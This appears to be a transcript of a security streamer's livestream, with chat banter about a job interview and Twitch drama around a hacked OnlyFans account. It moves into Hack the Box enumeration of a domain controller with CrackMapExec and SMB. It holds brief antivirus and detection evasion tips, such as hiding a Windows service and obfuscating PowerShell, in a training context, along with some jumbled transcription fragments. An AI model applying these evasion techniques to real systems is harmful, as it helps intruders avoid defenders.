It's Green Hill Phone. That's for you, Maticus, if you're in chat. All right, welcome everyone. We're back once again. And my camera is all messed up again. There we go. How is everybody? Finglui Muglunaf Klulu Vilje Gagnagel Fat. Welcome everyone to another Funday Sunday where we're gonna do fuck all, God knows what. We'll find something to do. I assure you, we will find something to do. Flipso with the 5 months. Welcome back. Bepper Nappet. Thank you for the follow. All right. What are we doing today? What are we up to? What shenaniganry? Some people have been asking. I got so many well wishes on the job interview situation. I'm so happy. Those are all very much appreciated. Unfortunately, I can't give you a conclusion to the story just yet. All I can say is that it's been progressing. Things are looking promising. I'm still not going to say anything until I've signed a written offer, just in case. But things are looking pretty promising. So we'll see how we'll see how it goes over this next week. This interview process was fairly straightforward. Like, you know, I think we've all been in a bad interview process before. Like, for example, I applied to the DHS Red Team, like, God, probably 5 months ago, like a long ass time ago. Like, it was definitely before DEF CON. I think it was like June or July or something, when I had to go in and take like a test in person. I had to go in and take a computer-based test for it, and which I did, and then I literally never heard back. I didn't get a single piece of correspondence from them ever since then, and I was like, well, what do I like? What is the deal here? Like, what's going on? I mean, I just assumed, like just about anyone would, I just assumed that they weren't interested. And then they get back yesterday in the middle of the weekend, and they're like, hey, we want to bring you in for a final interview. I'm like, well, it's a little late now. I hate it when that shit happens, dude. When they leave you hanging for like 5 months, like literally like 5 months, and they're just back now, and they're like, hey, let's bring you in for a final interview. So ridiculous. I did a little bit of Deadface CTF, and I've been malding with Rainy Day. I haven't been at many of the Saturday malding sessions. I was at one 2 weeks ago. Then I missed last week's, and I missed this week's. It's just Saturday is like the only day when I don't have like either streaming or my job going, and my job is very demanding right now. It's fourth quarter in consulting, so I'm working basically constantly. And so like Saturday I had to run errands and all that good stuff. So I didn't get a chance to get in there yesterday. With that long of a delay, I wouldn't want to take the interview out of principle. I mean, I just was like, well, I'm still technically looking, so I guess I do see the fit deck. I do see the fit deck coming in hot. We'll do one in just a second. We'll do one in just a second, and oh yeah, I considered not taking it, but I technically am still looking, so I guess I'll leave it in there. We'll see. I don't know. we'll see. Good indication of where you don't want to work when things move that slow. Government shit always moves that slow, but still, that's a little bit extreme, I would argue. It seems a lot of people are freaking out about Linux kernel 8 coming out. Does the InfoSec community think there will be a lot of exploits from it? There's always kernel exploits. There's always going to be kernel exploits. I don't think that I don't know if there's any buzz that this one is going to be any less secure than previous ones, but there's always new kernel exploits. You should at least ask them how the recruitment process works. Look, I I'll probably ask him in the interview. I'll probably joke about it. Like, I took this test way back in like June or May or something, and I didn't hear anything from you guys, so I just assumed you weren't interested. Like, when did I actually take it? Let me see if I can find it. Hang on. When did I actually take this shit? I took it in July, actually. I took it on July 26th. So it was in July, several weeks before DEF CON. Still, long-ass time ago. Hey, Cussa, good to see you. Oh, man. Did you guys hear? It's been all over Twitter, and it's been all over Reddit this morning. Did you guys hear about the Amaranth debacle? Like, that woman has more drama. All the interesting well, there's apparently been other Twitch drama that I haven't cared about. I'm expecting a critical video explaining the Amaranth drama within, like, 2 to 3 hours. At most. If it's not out already. Like, is it out? Hang on. Definitely there's gonna be one. Has he done one yet? Hang on. We're gonna find out. What'd she do now? She didn't do anything. Yeah, no, he hasn't done it yet. But it's coming. Did she compile some code without remarks? She didn't do anything. She apparently last night, I don't know anything about it other than what I saw on Livestream Fail. But apparently she revealed for the first time she has a husband after she had, like, Critical be releasing reaction vids before things happen. Dude, seriously. I know. He comes out with those so fast. Guaranteed by the time I'm done streaming, there'll be a Critical video on this whole debacle, so to explain the whole thing. But from what I understand on the clips I saw in Livestream Fail, she was on her stream last night, and she got a phone call and had to go on mute for like an hour and a half. She ended up being on mute for an hour and a half. And then she gets back on stream and she gets back on stream and unmutes and she's just sobbing. Like she's absolutely just sobbing. Like she's just she's like her eyes are all red, like she's been crying for a while now. And she's just sobbing. She explains that she has a husband and she's been fighting with him on the phone, and that he's threatening to like, and that he explained that he threatens her. He threatens to like he threatens to like invest all of her money in like in bad options, just to set it all on fire. Basically, he explains that she explains that he threatens her dogs, he threatens her horses. I know, that's what I said, Hubster. All of this completely out of nowhere. And, so I've said before that I respect Amaranth's grind. I'm not a viewer of hers, but I'm aware of how long she streams. Like, the uptime is right there under the thumbnail when her stream is displayed to me by Twitch. And the uptime is like, she streams like 16 hours sometimes. Like 14, 16 hours. And she has an OnlyFans, and she has God knows what else she does. She does an absolute insane amount of work. Like an absolutely stupid amount of work. It's crazy how much work she puts in. And now we know why. She explained that her husband only lets her sleep 4 hours a night in some cases. And basically forces her to do all this crazy fucking content. Like, he's basically just forcing the golden goose to make eggs all the fucking time. Yeah, I know, this is nutty. This is absolutely nutty. This is all just coming out. It's only happened on stream last night. Okay, don't be like that, Clay Hacks. Don't be like that. Okay, it's not hot. It isn't. It was transparently obvious she's been having a really shitty time of it. Okay. Again, let's be respectful. Okay, let's just be respectful. And she even put him on speakerphone she put him on speakerphone on the stream. And he was like screaming about how he was going to ruin everything. Like he was sounding absolutely unhinged, just completely screaming about how he's going to ruin everything. And if he can't have her, no one can. he definitely sounded like a very well put together individual who definitely doesn't need to be locked up for a long period of time. Very, very well put together individual there. And she gets all of this abuse online. Just as a reminder, she gets a ton of abuse online for what she does. And then she steps away from the screen finally after 16 hours of streaming, and God knows what else has been going on to her online, and gets that kind of treatment from her own goddamn husband. Let's be respectful, okay? Let's be respectful. I thought you were talking about the drama about being hacked. I did hear about that. She posted on Twitter about it. Apparently, but she wasn't actually hacked. They didn't actually succeed. They broke the password to her OnlyFans, apparently. Amaranth, if you don't know, I think it was earlier this week, Amaranth's OnlyFans was hacked, and she got notified when they tried to change her bank account. She had a whole bunch of money, like close to $1 million in her OnlyFans, unextracted. Apparently, she has a deal worked out with OnlyFans where she extracts money from it quarterly. So there was a lot of money banked in there, and someone broke the password and then tried to change her bank account to his or hers or whatever. And it wasn't quite 1 mil; it was just under that. I think it was like 900K or something. Not that that's not a lot of money, but it was. But apparently they failed. Apparently it failed at the check. Like it wouldn't let her change her bank account or whatever. And she got an email notification that her bank account was changing, which caused her to look into it. She didn't lose 900K, is my understanding, based on the two or three tweets I read about it. Somebody had a shit week. I mean, this is why I say let's be respectful, okay, guys? Like, we make fun. We tease about what Amaranth does, and that's all fine. But abuse isn't funny. Someone getting money stolen from them isn't funny. Like, I'm not a friend of hers. I don't know her. I'm not even a viewer or a subscriber of hers. How did they guess the password? No idea. I doubt she's even said it, how they guessed it. I'm not specially attached to her in any way. I just keep hearing about this stuff. It's just she's a prominent figure online. I can't help but hear about it. If you're on Twitch, you can't help but hear about this shit. But let's if we're gonna be talking about it, let's just be respectful. Someone hasn't gifted you a sub to her yet. I think someone has at one point just for funsies. But that I wouldn't call that being a subscriber. Cynics, thanks for the 5 months. Draws Gen and 20K lead, thanks for the follow. So yeah, two-factor authentication, kids. Does OnlyFans? I don't have an OnlyFans. Does OnlyFans have two-factor authentication? Does anybody know? They got to. Who doesn't have two-factor authentication? Hang on a second. I'm not gonna make an account in OnlyFans to find out if they have two-factor. Surely one of you degenerates knows if OnlyFans has two-factor. You have one, don't lie. I do not have an OnlyFans. It's a trick question. How is it a trick question? I just want to know if there's two-factor. Because there should be if certain people are banking 900K in there. There definitely should be two-factor. Chat takes the fifth. Like, there's no shame in having an OnlyFans. Two-step verification is recommended and encouraged to enable two-step. Download either mic. Okay, so there is two-factor. If Amaranth wasn't using two-factor, that's on her. She learned a lesson today, okay? She learned a lesson. Dat Guy Kim with the 7 months. Clam Security with the 68. That's so close. Why do you cock tease me like that? Clam Security, rude. Dat Guy Kim, thanks for the 7. Cynics, thanks for the 5, my friend. Cthulhu fhtagn. Welcome back to the All Has Red team. Go ahead and create an OnlyFans account for research purposes. I'm not gonna. It's not research. I'm just gonna trust you when they say, I'm just gonna trust you when you say that. When you say that they have two-factor. That's all I'm gonna say. They have Windows Hello Auth. You can authenticate with NTLM to OnlyFans. Oh, Kerberos authentication to OnlyFans. Anyway, again, not specially attached to Amaranth in any way. I just keep hearing about this stuff, and this is just a wacky fucking situation. I've only talked about drama on Amaranth. This is the second time I've ever talked about her on stream. Second time. Or at least at length. The first time it was because of her stalker situation. Which was also fucking wild. And this time it'll be... this time it's the husband stalker. The stalker was coming from inside the house. What's a good workout you like to do? Trying to do something. So this is a little bit weird. This is a little bit weird, but stick with me. I like to pick up heavy things and then put them back down again. So I know it sounds wacky. It sounds really wacky, but I really like to have heavy objects around that I pick up and then I put it down. And then I pick it up again and I put it back down again. And I do that a certain number of times. And then until my muscles are tired, and then I lift up a different heavy object. Yeah. Anonymous cheer with the 18 bits. Thanks so much, my man. During the day, when I'm not in one of my, workouts, during the day I like to do pull-ups, and I like to do the fit deck. I do pull-ups in the fit deck. Anyone do the pivoting and port forwarding module? There's a couple of sections that were kind of janky. I recommend Wreath for that. Wreath has a ton of port forwarding and pivoting in it. All right, let's do jumping jacks. We're going to be doing... For the fit deck, we're going to be doing 60 jumping jacks. Take this off just for ease. Let's switch here. There we go. What? Can I help you? You come over here. Hey. How tall is Al? I am 6 feet even.
Hunt.
Star
Make sure you stare at chat whilst you do it.
He's coming in and out of the room just yelling. What are you doing? Come here. What?
What are you doing, step bro?
All right. Okay.
6 feet Union
that's
High
not
have
right.
seen you at DEF CON.
I have seen you at DEF CON, then you know how tall I am. Redacted with the 4 months. I did stare at chat. Shadows Reveal was 69. Oreo and Bite at 69. Nice. That's very nice. Regular TV and Wana, thank you for the follows. Okay. Any advice to get over random BS troubleshooting? But before even starting to hack. Let me just clear that up for you. That's just part of the experience. That's literally just straight up part of the experience. Moy Bridge. That's just how it is. Are you on Kali, Moy Bridge, trying to install Ghidra? It should just be an apt install Ghidra now. It's in the repo. Or it's in the Kali repos. You get used to it. That's one reason I recommend using just Kali. So the progression is always, when you start out hacking, you use Kali when you're learning, and then you go through a phase where you're like, I'm skilled enough to use a different Linux distro now. I'm gonna use my own custom built Arch installation, or I'm gonna use Fedora, or something like, and you become adamant for a while. You go through a phase where you're adamant that you use your special distro, and then after a while you're just like, no, I'm just gonna use Kali, because you get tired of you just get tired of troubleshooting shit that doesn't work. And my version of that was Arch Linux, specifically Black Arch. Black Arch is neat. I like Black Arch, but there are too many tools that just didn't work for whatever reason. Like, it's this meme. I think I posted this on Twitter recently, but I'll show you the meme. It's this meme right here. Let me see if I can get a good example of it. Okay, it's this. Okay, this is the meme. Okay. I'm in the way. Okay. So this is the normal progression of this is the newbies, it's
I'm just so tired of
this is what the newbies
Kali
use.
just for it to fix one thing and
this
break
is what like
thing.
the
At Al4ZR3D.
This is what like the pen testers who've been doing it for a little while do. They use Black Arch, or they use Parrot, or they use something custom, and then the really experienced ones are just using Kali. And then like the really experienced ones, and I say this because this is how I usually do it with my work laptop. I like to install Commando on it, and then run Linux virtual machines and WSL on top of it. That's what my current work laptop is. My current work laptop is Windows 10 Commando. If you don't know what Commando is like it's an attempt at a Windows penetration testing operating system. It's really just a Windows 10 operating system with a lot of features disabled, and
A hunter must hunt.
And Windows Defender disabled, and it has a lot of pen testing tools installed. It has like that's the one from Mandiant. Yeah, I like Commando. The reason Commando is useful, and it's really like 50% because of this, because I like to use Rubius on assessments. When I'm doing Kerberos-based exploitation, I like to use Rubius, but I don't want to run it on the target, if that makes sense. I don't want to run Rubius on the target machine because that risks being caught. So instead, I run Rubius on my host machine, and I proxy the traffic through the compromised target. So that's why I use Commando. You could have also done it from a Windows VM, but it's just more complicated routing. I also think and I'm also just used to being in a Windows environment, desktop environment, so it makes more sense. It's more useful for like the report writing and stuff. Commando is also useful for the report writing feature. I've just really enjoyed running cubes and just running Kali VMs inside that. Yeah, everyone's got their own thing. You're in this phase. You're in this phase right here. The thing about this phase is it eventually ends, and you're eventually just like, I'm just going to use Kali because it saves me a lot of troubleshooting time. Like, Parrot isn't bad. I have a Parrot dev box that I use to do development on. But Parrot is really weird. It's very strange. There's a ZSHRC that it's expecting you to use, but ZSH is not your default shell. You have to install ZSH and then make it your default shell. And also, the default prompt has no space after it, so your command is like touching the prompt. It's touching the $sign. It's very strange. I don't know why that's the default setting of Parrot. It's very odd. And also the performance just isn't great. The Kali performance just isn't good. Or the Kali performance is just better than Parrot. Like, the thing is that when I want to pen test, I just want to spin up a VM and be basically ready to go. When I install a Kali machine, I move my ZSHRC on there. I move my tmux configuration. I move all that stuff in there. And then I install Docker, and I install a couple of other tools that I know I definitely need, and that's it. That's all I have to do. There's no other setup that is required for me. Like, it's good to go. Anyway, there you go. Yeah, that's... let's do some hacking, okay? Let's do some hacking. Let's hack from Hannah Montana Linux. We could hack from Hannah Montana Linux. Okay, let's do... What do we want to do today? All right, get your votes in. FFC not really with the first time indoctrination of the cult. Welcome, my friend. Oreo Bite with the 69. Nice. T-Gold Biddies. I'm so tired of updating Kali just for it to fix one thing and break another thing. I don't have that problem, honestly. I have not had that problem. I've had some issues with Kali and WSL. Kali and WSL can sometimes be irritating. I'll give you that one. But it's not so irritating that I don't use it. I still use Kali and WSL. WSL, I don't blame the problems on Kali. I blame them on WSL. Like, WSL's performance... What is... I hate how it buffers all of my keyboard inputs when I hold the key down. Like, I'm just leaving. Bye, guys. Bye, guys. I'm leaving. Jesus. Okay, no, I'm coming back. I'm coming back. The problem is I'm trying to move my webcam around. I moved it around for marbles last time. And I'm trying to get it back where I want it. And if I try to hold down the key, it buffers all of my inputs. See, now I'm just coming down too far. Like, I'm never going to get it to where I need it to go. Okay, one at a time. Al should have an Ubuntu to redeem. It's just Kali again. Ubuntu is just Kali. Even the attack box is Ubuntu. Quetzalcoatl, thanks so much for the first time Prime indoctrination into the cult. Welcome, my friend. Quetzalcoatl, thanks for the follow as well. JD, thanks for the follow. Okay, hopefully we're going to get my camera. It's a very riveting stream. We're looking at Melania Blade of Mikola while I fix my fucking webcam situation. I moved it around for marbles last time and then never moved it back. Alright, that looks about right. We're not moving it. Alright, we're not moving it. You come 90, we come 10. Did you just hitch me? Did you just hitch me? Alrighty, let's, we're doing Hack the Box today. How interesting. Alright, Hack the Box it is. Alright. Let's just change to FTL there. Okay. Let's get the old version. Because the new Hack the Box still sucks after like 3 years. How long have we had the new version of Hack the Box, and it's the new Hack the Box UI, and it's still bad. It's still not good. Okay. Machines. When would you say that too many channel points are too many? Yeah, I use ad block, sorry. How was rainy day? I didn't do it yesterday. How was it? Looks like a typical hard box. 40 user owns, 12 root owns. Any particular reason for using the old interface? Because I use the mod server, and the mod server is only accessible through the old interface. Probably through the API as well, but I don't use the API. Alright, so last Thursday we did Scrambled. What would you guys like to see today? Any particular box you guys want to see? Definitely would be more system owns with your help. Oh, I doubt that very much. We got some smart guys in there. I'm mostly just along for the ride. Windows box, Linux box. People want to see all kinds of shit today. Well, why don't we just pick someone? I'll pick a good smattering that they say. Object is a Windows box. Secret is a Linux box. I'm mostly just picking these at random. Search is a Windows box. Good Games is a Linux box. Spook Troll. I already did Spook Troll once. That box is really cool. We did Spook Troll. I'm not gonna do it again today, but we did do that one. I believe it's up on my YouTube. Timelapse sounds good. All right, get your votes in, kids. Object is a clean 5-0. That's why I put it in there. I try to pick ones that we don't want to do super hard ones. You guys think you want to see the super hard ones. You actually don't, okay? Realistically, you don't really want to see the super hard ones on stream. And that's because I tend to be stuck for a long period of time. And that's not entertaining for you guys. There's learning, and then there's just watching me beat my head against the wall for who knows how long. And I don't want to have to like use a walkthrough just to move the box along. So, I try to keep it reasonable. We've done the insane boxes on stream before. They usually take multiple streams. I try to balance like learning with and molding with also and being entertaining. And that's hard to do with the insane boxes. The insane boxes are hard enough if I'm doing them alone. IU and Rainbow Table, thank you for the follow. Cthulhu Fountain to the both of you. Old Norse and Stupid Sexy Flanders, thank you for the follows as well. Figo2, thanks for the follow. Except the takedown box, that was really awesome, yes. Get your votes in. Let me go ahead and start my virtual machine, because I haven't done that. The insane boxes are turning the molding and soul off. Like, there's always molding with insane boxes. You expect that with insane boxes. And I know we've done some Hack the Box insane boxes on stream. And some of them have taken like 2 or 3 streams to get through. And that's just, it's just not entertaining for you guys. Oh, man. I'm drawing close to 10K followers on Twitter. Hey, follow me on Twitter if you don't. I want to get to 10K.
A hunter must hunt.
I want to get to 10. I want to get to 5 digits of followers on Twitter. I know I don't care about my Twitter at all, but like it would be nice to stop looking at 9,900. Search won. Yep, search did win. Search it is. Where is search? Here you are. So we'll start it on the mod server here. Okay, Kim K. I do think that I don't know for sure, but I'm pretty sure Kim Kardashian has more Twitter followers than me. She may have a few more. It's hard to say. I love the console tricks that you share in Twitter. Yeah, I try to share one new trick every day. If you don't know, I try to share one little trick. Like, they're usually red teaming related, usually pen testing, red teaming related. I try to keep them red teaming related, often about like antivirus evasion, EDR evasion, and stuff. They're not really tradecraft. I wouldn't call my tweets tradecraft. They're really just cute little one-liners that can do a cool thing. Like help like hiding your processes as a different process. And the other day I posted how you can make a Windows service basically invisible. I think I'm actually going to do a YouTube video on that one, but I've stalled on my YouTube video content creation because work is so demanding recently. But I want to do a quick YouTube video on the how to make a Windows service essentially invisible. It's not completely invisible. You can see it in the registry still. It's still listed in the registry along with the other services. But the various service enumeration tools like sc.exe, services.exe, etc., and get service in the get service PowerShell commandlet, basically completely invisible to those things. It's just a nasty little trick. I posted on Twitter. It was a tweet a couple of days ago. If you want to see it, go check out a Twitter thread from a couple of days ago that I posted. Invisible to auto runs. I'm not sure how auto runs. I think auto runs checks the registry, so auto runs would find it because it would find it in the registry. But the key is to pick a service name that looks normal, that looks typical. Pick a name of a service that's going to blend in. It's not completely invisible. It's just invisible to the built-in tools that don't check the registry. VMware or VirtualBox? I do VirtualBox. I do VMware at work, but VirtualBox here. And the reason is because VirtualBox does not play nice with Hyper-V. VirtualBox does not like Hyper-V at all. And I need Hyper-V installed because I need Docker. Docker requires Hyper-V. I need Hyper-V. VirtualBox does not play nice with Hyper-V, so I have to use VMware at work. Much to my dismay, because I detest VMware. Okay. Alright, we started search. Let's connect to the VPN. Oh my god. Open Office. Not release. We don't want the release one. We just want the regular one. Are you working from home at the moment? Yeah, I have. For my last several jobs, I've worked at home. With some travel. You still have OpenOffice installed? Unfortunately, yes. I don't want to uninstall it because every so often you need one of these word processors for like HacktheBox machines or something. And every time I install it, it takes like 40 minutes. So unfortunately, I'm leaving it installed. Okay. Let's try and ping it. 10, 10, 11, 129.
Listen.
What? Just a guy? Title change? Oh yeah, I'll change the title. Hang on a sec. Okay, we can ping it. Let's do nmap tech sc 11.129. Oh wait, hang on. Fuck. HacktheBox Mictor. Search. Oh, did I already do this one? Well, we'll pretend I didn't do it. Sorry. We'll just delete. We deleted the entire. I don't know what it is. Okay, we're gonna be doing this one. We're still gonna do it. But apparently I've done it, never submitted the flags. It's very common for me to do Hack the Box machines and just not submit the flags because I don't really care. I don't care. I just care about getting the root flag. I don't care about submitting it and like seeing number go up in Hack the Box. I don't care about that. So it looks like I didn't submit the flag for search, but that's fine. We're gonna do it anyways. I don't remember the box at all. I clearly don't remember it at all. If I don't, hopefully it won't. Hopefully I won't remember much of it at all. All right, we see 80. We see 53 right off the bat, which indicates what? Yeah, it's a DC. It's more active directory. We're gonna be attacking attactive directory. It's another attactive directory today, friends. Root in with the 4 months. Zekers with the follow. Let me change the title. Okay, so the first thing I like to do with a Windows machine is I like to use my good friend CrackMapExec. Big fan of CrackMapExec. I forgot SMB. CrackMapExec is one of the most useful tools for internal penetration tests that you're ever going to find. It's also very useful for red teaming. Red teaming, pen testing, CrackMapExec is very, very, very useful. I deeply recommend that you familiarize yourself with this tool. I cannot emphasize enough how useful CrackMapExec can be. Okay, so please take a look at this tool if you haven't. All right, domain is search.htb. Let's get some notes going here. We're gonna need to write down some notes. Hack the box. Okay, I deleted all the notes without looking at them. Obsidian changed their look, by the way. Obsidian updated itself, and now it looks slightly different. It looks nice, though. I'm not complaining. So it looks like search.htb right here. I thought that port 88 gives away that it's a DC. It does. But port 53 also does it. Port 53, the domain controllers are often DNS servers as well. So it's also research. Are you a fan of Enum for Linux? Yes. CrackMapExec, though, is especially useful. So we'll try a couple of things here. We'll try a null session. Always good to try. A null session is where you try to authenticate to the machine with no username or password. Access denied. We can try the guest account. Let's do a full port scan. Let that run in the background. We're seeing lots of LDAP stuff, per usual. LDAP, LDAP, LDAP. 443, port 80. Let's go look at that web server. Web server. Nmap scripts? Love Nmap scripts. Those are also very useful. I don't usually use them on stream, but I use them in the real world quite a bit. Research. Oh, is this that one? Okay, let's just skip the beginning stupidity. Okay, so you see this? This is so fucking stupid. Okay, let's just go ahead and zoom in. It's just right there on the web page. I'm still. I could still. Let's switch if it's been done again. Do we want to switch? I don't remember the rest of the box. I just remember this part. All I remember about the rest is I thought it was a really cool box, except for this part. I remember it being a really cool box, except for this part. In fairness, but I don't remember anything else about the rest of it. Honestly, my notes were really scant, too. I wrote this password down in there, and that was basically it. I'm terrible at taking notes. Do we want to switch? If we're going to switch, we better do it now. I'll do a poll, really quick. Get your votes in. I need to start at least submitting the flags so I know which ones I've done. I'm sorry, guys. I'm sorry about that. I don't really care about submitting the flags. I just don't. I'm not trying to compete in Hack the Box. I usually only submit the flags if we're doing the release arena. What about Pwn category? I'm not good enough to do the Pwn category on Hack the Box. The rest of the box I remember being really good. I remember this being the only dumb part. I don't remember the rest of it. How long did it take you to see that? I didn't. Chat told me about it. I was... The first time I did the box, I remember distinctly that I was stuck for a long-ass time. Well, not a long-ass time. Chat wasted basically no time in telling me about it. But I didn't see it. Chat told me about it. It's just, I wasn't looking. Okay, people want to switch. Okay, we have to be quick, though, because we're already over an hour into the stream, and I want to start hacking something. What are we doing? Give me box ideas. I'm probably just going to pick one, because I'm tired of doing polls. What was that one that was 5.0 that I saw? Object? Okay, do we want to do it? Let's do object. How's that? Let's do object, a medium Windows box. Do I have a folder for object in here? Let me find out. I do. So we've done object too. God damn it. This is the first time I've run into this. How about Timelapse? I do not have one for Timelapse. Timelapse is a Windows box. Something recently retired? I don't know which box they recently retired. I haven't had a chance to watch the IPSec video yet. Timelapse. This looks like an easy rated Windows box. How about this? How about we do Timelapse? Is everyone good with that? I just want to pick something. I don't want us to be trying to pick a box forever. I haven't done this one. I have no notes on it. Yeah, I have no. I do not have a node page for it. I have not done this one. I think we're good. You're the streamer. You tell us. I participate in the decision-making process. Redacted. Fucking redacted every time. All right, let's. We'll kill search here. search. Let's do time-lapse. Just trying to pick one that I haven't done yet. I need to start submitting the flags just so that I'll know which boxes I've done before. And again, in fairness for search, after that first dumb part, the rest of it is really I remember the rest of it being really cool. I remember the rest of search being really neat. It's just that first part that is kind of shitty, with the password just there in an image. Any advice on bypassing AV with PowerShell? Yeah, invoke obfuscation.ps1. If you don't know how PowerShell well enough to obfuscate your stuff on your own, use invoke obfuscation. There's also unmanaged PowerShell, but you still have to cope with AMSI in that situation. Okay, let's try pinging it. It's not up yet, so we'll give it a second. Speaking of IPSEC, he actually joined the voice chat yesterday and spoke like a video intro. Really? He joined the HacktheBox group? You're shitting me. Nuh-uh. God damn it, I was running errands all day. Fuck! Damn it! He joined our HacktheBox group? Fuck. Of all the days to miss. Wait, did he help us blood the box? Wait a minute. Did he help us do the box? Or did he just join for a minute and do his YouTube shtick? He was in and out in like 1 minute. Oh, that's nice of him. I've really appreciated IPSEC just being here for the stream recently. I personally respect IPSEC a great deal. So it means a lot to me that he's here. Personally, it's good to have him. I respect him quite a bit. So it would have been cool if I'd been there. Damn it. I was running errands all day because that's the only day I have to run errands. I stream today, and every other day I'm working. So I had to get my errands in or I was going to be out of food. What's a good CMS standard? DrupScan is not maintained anymore. WPScan is good. There are other scanners for Drupal as well, not just DrupScan. All right, we got it. Ten 11-152. Let it begin. Who needs food? Week? I don't want it. The problem is I've really wanted to cut down on my door dashing and grub hubbing. Like, it's so bad. I got so bad with the DoorDash, and I'm just really trying to like not ever order food anymore. Like unless I'm like like hanging out with some people or something like that, and we all want to order food. I'm trying not to order any food on my own anymore, because I was just getting into a really bad habit with that. So I just didn't want to. I knew that if I didn't go get groceries today, that I was gonna start tomorrow. I was gonna start feeling like I need to do that in order to fucking eat. So I just God, I missed I missed IPSEC. Oh well, it happens. Yeah, this is cool retro term, CRT. You can download this. It's in the Kali repos. Just apt tac install cool tac retro term tac. Cool tac retro tac term. So it's apt tac y install cool retro term. It's gonna tell me I already have it installed, but yeah. That's what makes the terminal look this way. I'm doing good, Gambit. Good to see you. Yeah, give it a shot. It's on GitHub as well. You don't have to have it on Kali. It is on GitHub, so take a look at it. All right, what do we have here? This is a Windows machine. Oh, good. We still have a domain controller here. We do not have a web server that we're seeing here. We're seeing all the other ports open, just not web. So presumably there's not a random password sitting there on the a random password sitting there. He came in around the same time we got the initial foothold. Oh, fantastic, Clay Hacks. I'm happy he did that. I've been happy to see him in the chat more often recently. He just shows up, he hangs out. He interacts with me on Twitter and on Discord. We have an ongoing correspondence. I know it doesn't mean anything to him, but it means a lot to me, so I appreciate it. What did I do wrong? Did I do the wrong port? What did I do here? Maybe it's blocked. Maybe Nmap's ping must have failed for some reason. Let's just do TAC-PN there. There we go. 10, 10, 11. Let's do the same thing we did with CrackMapExec. CrackMapExec. 10, 10, 11. 152, was it? Yes. Let's try a guest account. Did you guys just get started with this machine? Yeah, we just got started. We were going to do a different machine, then it turned out I'd done it before. So here we see the classic authentication to the guest account with no password. This is pretty common. We see that it's the name of it is DC01. Let's do... Timelapse, this is called. Yep. And it's going to be dc01.timelapse.htb. Comment on boxes are in the real world? Yes. So who was the interviewer? I'm not saying anything about the interviewer. Not yet, anyway. I'm hoping to have more information for you on that front later this week. We'll see. I don't want to give you guys any information and potentially jeopardize the situation I'm in. Yeah, so just playing it safe here. Super Axe Hacker with the 6 months. Welcome back. Brian Alexperia, COVID Express. Thank you for the follows. How did the interview go? Good. I think it's very promising. It's very, very promising. Interview went well. I'm in a promising situation. I don't want to talk about it. Not because they asked me not to talk about it, but because I want to be respectful of them, and I don't want to potentially ruin a good thing. So we're just gonna play it safe. You'll hear more about it later this week, I'm hoping. Thank you for all the well wishes. So we got SMB signing is true. That's normal for a domain controller. We can try to see what shares are available. What company was it? I'm not telling you. I'm not telling you. Any hints on what the interview was about? It was about cybersecurity. Is he a content creator? Yes and no. Box name? Oh yeah, I'll change the box name. He does create content, yes. But you guys probably don't think of him as a content creator. Properties, HacktheBox, Timelapse. There we go. Okay. Timelapse. Just don't tell us it's Rapid7. Had a bad experience with them and you're in the UK. What bad experience did you have, Gambit? I haven't heard any bad negative things about Rapid7 in general. But what did you, out of curiosity, what did you hear? All right, so we have the IPC dollar share and we have the shares share. So the first thing we can do, because we have read access to the IPC dollar share, we can do a nice RID brute. Is it Amarant's husband? God, I hope not. Either written a book or written a famous tool. Possibly. It possibly is one of those. Matter Hacks, I just interviewed with them this week. You mean you interviewed with Rapid 7? How did that go? I haven't heard anything negative or positive about Rapid 7. I don't know anything. I don't know anything about them. My God, he's going to work for Rasta. I'm not going to tell you. Not going to tell you. They think I'm going to let something slip. I'm not going to let anything slip. Okay, we have a list. We have the CyberGeek payload. Every user on this domain is like elite hacker name, so that's good. So let's just take all of this. These are all the user accounts that we care about. And then we can probably spray. I'm guessing we're probably going to curb root or something like that. We can look at the shares folder first. The Rapid 7 interview was fine. Seemed like good people to work with. Well, Gambit said he had a bad experience. So I'm wondering what his bad experience was, but he hasn't answered. I have a good feeling of what it is now, but I'll keep my mouth shut. I mean, you can guess. I'll just lie. You're welcome to guess, but if you guess it correctly, I'm just going to lie. Yeah, anything is possible if you just lie, kids. The world is your oyster. You could just lie. Like, you know what? God, I hate this. Fucking Helen of Tor. Get what this bitch did this week, okay? I promise this is related, however tangentially. Let's hear what this bitch did this week, okay? This bitch, out of nowhere this week, on like Wednesday or Thursday or something, is like, hey, there's this new Netflix trash reality TV show. We love trash reality TV, okay? I love shitty reality TV. I have a really love-hate relationship with it. I think many of us often do. And she's like, hey, there's this Netflix reality TV show called The Mole that I've been watching, and I think you would really like it. It's like a group of people. They have to do these challenges that are all like escape rooms. If you don't know, I love escape rooms. I fucking love escape rooms. It's one of my favorite things to do with like a group of friends. I love doing escape rooms. So she's like, they all do escape. They do all the challenges are basically escape rooms. But one of them is like a mole and is trying to is trying to undermine all of the rest of them. And I'm like, I'll give it a quick shot. This fucking bitch knew I was gonna hate the show. I hate it, but I love it. And I can't stop watching. She fucking knew it. And get this. She told me about the show before it was over. So I still don't know who the mole is. I binged the whole thing, and I still don't know who the mole is. And I have to wait until next week. She put this, she told me to watch it before it was over, so that I would have to join her in her suffering. God damn it. This fucking bitch. All right. Sorry, I just had to rant about that a little bit. Anyway, the show sucks, but you're also not going to be able to stop watching once you start it. If you like that kind of TV, I recommend it. Like, that's what I'll say. If you like shitty, trashy reality TV, then I do recommend The Mole. It was a good time. Or it is a good time. But I recommend it maybe after this coming weekend when they'll release the final episodes. You had me at shitty and trashy. Oh, it's definitely shitty and trashy. It'll get you. All right, so there was that shares share, right? It's not that she told me about a show she knew I would like. She told me about it before it was over. So now I have to wait. I have to exist in suffering. Back when I was a product specialist, Rapid7 is one of the vendors I specialized in, among some others. It's a long story, one too long for chat. It's more that I didn't like how they did things, mainly to pissing off several high-profile clients. Okay. Well, I mean, I don't know anything about that. I haven't heard anything bad about Rapid7 as a company. I've never heard anything super good about them as a company. But I haven't heard anything bad, that's for sure. So, what were the interview questions like? They were largely scenario-based questions, which is pretty normal for a red team interview. Normally, if you're interviewing for a red team position, they're not going to ask you questions like, what is cross-site scripting? What are the different kinds of cross-site scripting? They're going to assume you know that shit, and they're going to instead walk you through a scenario, like a hypothetical testing scenario. I mean, pissing off high-profile clients has had to been HD Moore's thing forever. Well, I mean, this sounds like a super anecdotal thing. I'm not going to try and judge them harshly with it. But yeah, if you had a bad experience, I'm sorry to hear that. 10, 10, 11, 152. Shares. And then we put no password. Okay, there we go. Dir. Okay, recurse on. Prompt off. Mget star. All right. So we are downloading the contents of this share. Has Critical posted his Amaranth video yet? It's coming. Oh man, he's late with this one. This drama's been out for like 12 